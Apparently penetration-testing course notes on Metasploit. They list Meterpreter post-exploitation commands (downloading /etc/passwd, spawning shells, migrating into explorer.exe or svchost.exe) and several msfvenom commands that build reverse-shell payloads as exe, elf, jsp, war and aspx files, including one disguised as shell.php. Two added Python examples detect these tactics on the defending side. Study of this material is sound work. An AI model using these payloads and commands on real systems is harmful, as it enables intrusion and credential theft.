
Using Metasploit Payloads

21.2.1 - Meterpreter payload

From the Meterpreter session we can gather further information on the system and the user context the session runs as (the session and its findings are saved in our workspace)

sysinfo
getuid

From the Meterpreter session we can open an interactive channel with shell, then background that channel with CTRL + Z to return to the Meterpreter prompt

shell
CTRL+Z

List all active channels

channel -l 

Show and change the local (Kali) working directory from within Meterpreter

lpwd
lcd /home/kali/Downloads

We can download files from the remote machine using meterpreter

download /etc/passwd

Upload files

upload /usr/bin/unix-privesc-check /tmp/

21.2.2 - Executable payloads

Metasploit also provides the functionality to export payloads into various file types and formats such as Windows and Linux binaries, webshells, and more. These payloads can be generated as either Meterpreter or plain (non-Meterpreter) shells.

MSFVENOM Cheatsheet
https://github.com/frizb/MSF-Venom-Cheatsheet

List the available payloads for Windows on the x64 architecture (used below to create a Windows executable with a reverse shell payload)

msfvenom -l payloads --platform windows --arch x64

Non-staged TCP revshell

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o nonstaged.exe

Staged TCP revshell

msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o staged.exe

Linux 64 bit non-staged TCP revshell (ELF)

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f elf -o revshell.elf

Linux 64 bit (ELF binary written to a .php filename)

msfvenom -p linux/x64/shell_reverse_tcp LHOST=$IP LPORT=443 -f elf > shell.php

Windows 64 bit

msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=<port you designated> -f exe -o ~/shell.exe

Apache Tomcat JSP shell (raw output)

msfvenom -p java/jsp_shell_reverse_tcp LHOST=$IP LPORT=80 -f raw > shell.jsp

Windows 64 bit aspx

msfvenom -f aspx -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=443 -o shell64.aspx

Apache Tomcat War file

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.179 LPORT=8080 -f war > shell.war

Javascript shellcode

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.179 LPORT=443 -f js_le -o shellcode
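The formats listed above (an ELF saved as shell.php, a raw JSP, a WAR that is really a zip archive, a PE .exe) all share one property: the file extension says nothing reliable about the content. As an added example that is not part of these notes or of Metasploit, the following Python shows the receiving side of that problem: an upload check that sniffs the real container format from magic bytes and compares it against the extension and an allow-list. The endpoint policy, the trusted-extension table and every sample input are constructed assumptions.

```python
"""Server-side upload check that sniffs the real container format from magic
bytes instead of trusting the file extension.

Added example, not from the original notes or from Metasploit: the msfvenom
commands above emit an ELF binary written to shell.php, a raw JSP, and a WAR
(which is a zip archive), so an extension-only filter on the receiving server
learns nothing about what it actually stored. All sample inputs below are
constructed stand-ins, not real payloads.
"""
import os

# Magic-byte signatures for the container formats the msfvenom commands produce.
SIGNATURES = {
    b"\x7fELF": "elf",      # Linux executable (-f elf)
    b"MZ": "pe",            # Windows executable (-f exe)
    b"PK\x03\x04": "zip",   # WAR/JAR archives are zip files (-f war)
}

# Extensions that legitimately carry each container; native executables are
# never expected on an upload endpoint, so "elf" has no acceptable extension.
EXTENSION_FOR = {"elf": set(), "pe": {".exe", ".dll"}, "zip": {".zip", ".jar", ".war"}}

# Extension allow-list for this hypothetical upload endpoint (assumed policy).
ACCEPTED_EXTENSIONS = {".jpg", ".png", ".pdf", ".txt", ".zip"}


def sniff_container(data: bytes) -> str:
    """Return 'elf', 'pe', 'zip', 'text' or 'unknown' from the leading bytes."""
    for magic, name in SIGNATURES.items():
        if data.startswith(magic):
            return name
    head = data[:512]
    if head and all(b in b"\t\n\r" or 32 <= b < 127 for b in head):
        return "text"
    return "unknown"


def has_server_scriptlet(data: bytes) -> bool:
    """Heuristic: raw JSP/ASPX shells start with a page directive or scriptlet."""
    return b"<%" in data[:4096]


def check_upload(filename: str, data: bytes) -> dict:
    """Return a verdict for one uploaded file: flagged if anything is off."""
    ext = os.path.splitext(filename)[1].lower()
    container = sniff_container(data)
    reasons = []
    if ext not in ACCEPTED_EXTENSIONS:
        reasons.append(f"extension {ext or '<none>'} not on allow-list")
    if container in EXTENSION_FOR and ext not in EXTENSION_FOR[container]:
        reasons.append(f"content is {container} but extension is {ext or '<none>'}")
    if container == "text" and has_server_scriptlet(data):
        reasons.append("server-side scriptlet inside a text upload")
    return {"filename": filename, "container": container,
            "flagged": bool(reasons), "reasons": reasons}


def scan_uploads(uploads: dict) -> dict:
    """Check every (filename -> bytes) pair and return the verdicts by filename."""
    return {name: check_upload(name, data) for name, data in uploads.items()}


# Constructed sample uploads: headers only, no real code or payloads.
SAMPLE_UPLOADS = {
    "shell.php": b"\x7fELF\x02\x01\x01" + b"\x00" * 13,       # ELF hiding behind .php
    "photo.jpg": b"MZ\x90\x00\x03\x00\x00\x00",               # PE hiding behind .jpg
    "shell.war": b"PK\x03\x04\x14\x00\x00\x00",               # WAR (zip) on a non-accepted extension
    "shell.jsp": b'<%@ page import="java.io.*" %>\n',         # raw JSP directive
    "page.txt": b"hello <% out.println(1) %>\n",              # scriptlet inside a .txt
    "notes.txt": b"plain meeting notes\n",                    # clean
    "archive.zip": b"PK\x03\x04\x14\x00\x00\x00",             # clean
}

if __name__ == "__main__":
    for name, verdict in scan_uploads(SAMPLE_UPLOADS).items():
        state = "FLAG " if verdict["flagged"] else "ok   "
        print(f"{state}{name:12s} {verdict['container']:8s} {'; '.join(verdict['reasons'])}")
```

The scriptlet check is deliberately a blunt heuristic; the point is that the magic-byte and allow-list checks catch the ELF-as-.php and PE-as-.jpg cases that an extension filter alone would pass.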

Run the exploit or handler as a background job from msfconsole (the Meterpreter session then opens without blocking the console), and list running jobs

run -j
jobs

Migrate in Meterpreter

The migrate command in Meterpreter tells the payload to move itself into another, more stable process. This means:

  • The malicious Meterpreter code leaves the initial compromised process (which may be crashing or monitored),
  • And injects itself into a new process, usually something like explorer.exe, svchost.exe, or another system process,
  • Letting the session persist and continue interacting with the system.

This is super important for post-exploitation stability.
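Seen from the other side, a migration is a remote thread created in explorer.exe or svchost.exe by a process that has no business doing so, which Sysmon records as Event ID 8 (CreateRemoteThread). As an added example that is not part of these notes or of Metasploit, the following Python scores such records with three signals: the target is a common migrate destination, the source image lives outside the system directories, and the new thread's start address is not backed by a loaded module. The records are constructed in a simplified tab-separated key=value form rather than real Sysmon XML (the field names follow the Event 8 schema), and the trusted directories, target list and thresholds are assumptions to tune per environment.

```python
"""Flag Sysmon Event ID 8 (CreateRemoteThread) records that look like a
Meterpreter session migrating into explorer.exe or svchost.exe.

Added example, not part of the original notes or of Metasploit. The records
below are constructed in a simplified tab-separated key=value form (not real
Sysmon XML); the field names follow the Event 8 schema. Trusted directories,
the target list and the scoring thresholds are assumptions to tune per estate.
"""
from dataclasses import dataclass

# Processes the notes name as usual migrate destinations (extend per estate).
MIGRATE_TARGETS = {"explorer.exe", "svchost.exe"}
# Source images under these directories get the benefit of the doubt.
TRUSTED_SOURCE_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


@dataclass
class Finding:
    source: str
    target: str
    severity: str
    reasons: list


def parse_event(line: str) -> dict:
    """Parse one tab-separated key=value record into a dict."""
    fields = {}
    for part in line.rstrip("\n").split("\t"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def image_name(path: str) -> str:
    """Lower-case file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def assess(ev: dict):
    """Return a Finding for a suspicious CreateRemoteThread, else None."""
    if ev.get("EventID") != "8":
        return None
    src, tgt = ev.get("SourceImage", ""), ev.get("TargetImage", "")
    reasons = []
    if image_name(tgt) in MIGRATE_TARGETS:
        reasons.append("target is a common migrate destination")
    if not src.lower().startswith(TRUSTED_SOURCE_DIRS):
        reasons.append("source image outside trusted system directories")
    if not ev.get("StartModule"):
        reasons.append("thread start address not backed by a loaded module")
    if len(reasons) < 2:
        return None  # a single weak signal is routine on a busy host
    severity = "high" if len(reasons) == 3 else "medium"
    return Finding(src, tgt, severity, reasons)


def hunt(lines) -> list:
    """Run assess() over raw records and return the findings in order."""
    findings = []
    for line in lines:
        finding = assess(parse_event(line))
        if finding:
            findings.append(finding)
    return findings


# Constructed sample records (file names borrowed from the msfvenom commands above).
SAMPLE_EVENTS = [
    "EventID=8\tSourceImage=C:\\Users\\bob\\Downloads\\nonstaged.exe\tSourceProcessId=4120"
    "\tTargetImage=C:\\Windows\\explorer.exe\tTargetProcessId=3016"
    "\tStartAddress=0x1D3A0F40000\tStartModule=\tStartFunction=",
    "EventID=8\tSourceImage=C:\\Windows\\System32\\csrss.exe\tSourceProcessId=612"
    "\tTargetImage=C:\\Windows\\System32\\svchost.exe\tTargetProcessId=1180"
    "\tStartAddress=0x7FFB1A2C0000\tStartModule=C:\\Windows\\System32\\ntdll.dll"
    "\tStartFunction=LoadLibraryW",
    "EventID=1\tImage=C:\\Windows\\System32\\notepad.exe\tProcessId=5500",
    "EventID=8\tSourceImage=C:\\Program Files\\Vendor\\agent.exe\tSourceProcessId=2044"
    "\tTargetImage=C:\\Windows\\System32\\svchost.exe\tTargetProcessId=1180"
    "\tStartAddress=0x7FFB0B110000\tStartModule=C:\\Program Files\\Vendor\\hook.dll"
    "\tStartFunction=",
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.source} -> {f.target}: {'; '.join(f.reasons)}")
```

The two-signal threshold keeps routine system activity (the csrss.exe record, where the thread starts inside ntdll.dll) out of the results, while the user-profile binary with an unbacked start address in explorer.exe scores high; third-party agents that hook svchost.exe land in the medium bucket for triage.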
